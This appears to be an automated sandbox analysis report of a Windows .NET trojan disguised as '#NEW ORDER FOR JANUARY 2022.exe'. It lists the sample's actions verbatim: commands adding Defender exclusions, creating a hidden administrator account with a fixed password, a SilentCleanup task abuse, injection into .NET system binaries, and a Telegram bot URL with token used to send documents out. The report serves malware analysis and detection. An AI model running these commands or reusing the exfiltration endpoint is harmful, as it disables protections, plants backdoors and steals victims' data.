Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp; String found in binary or memory: https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/sendDocumentdocument-----
Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown; DNS traffic detected: queries for: api.telegram.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe; Window created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sample | Static PE information: Filename: #NEW ORDER FOR JANUARY 2022.exe
                      .NET source code contains very large array initializations
                      Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
                      Source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.cs | Large array initialization: .cctor: array initializer size 12088
                      Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.719160313.0000000000EBA000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.VisualStudio.Language.Intellisense.dllT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameaspnet_regbrowsers.exeT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.719405918.00000000012F8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730697748.00000000036E3000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: get_OriginalFileName vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: backupOfOriginalFileName vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: originalFileName vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameComSvcConfig.exeT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameaspnet_regbrowsers.exeT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameZakrytyeKupla.exe< vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: svchost.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: #NEW ORDER FOR JANUARY 2022.exe | ReversingLabs: Detection: 18%
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File read: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /add
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /del
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /del
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /addJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /addJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /addJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /delJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exeJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /addJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /addJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /addJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /delJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID='6588'
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | WMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle="6588"::GetOwner
                      Source: C:\Windows\SysWOW64\net1.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID='4876'
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | WMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle="4876"::GetOwner
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID='6712'
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | WMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle="6712"::GetOwner
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#NEW ORDER FOR JANUARY 2022.exe.log
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knfqx50j.snp.ps1
                      Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@71/19@1/1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2628:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1556:120:WilError_01
                      Source: #NEW ORDER FOR JANUARY 2022.exe, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: svchost.exe.0.dr, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.df0000.0.unpack, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 0.0.#NEW ORDER FOR JANUARY 2022.exe.df0000.0.unpack, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
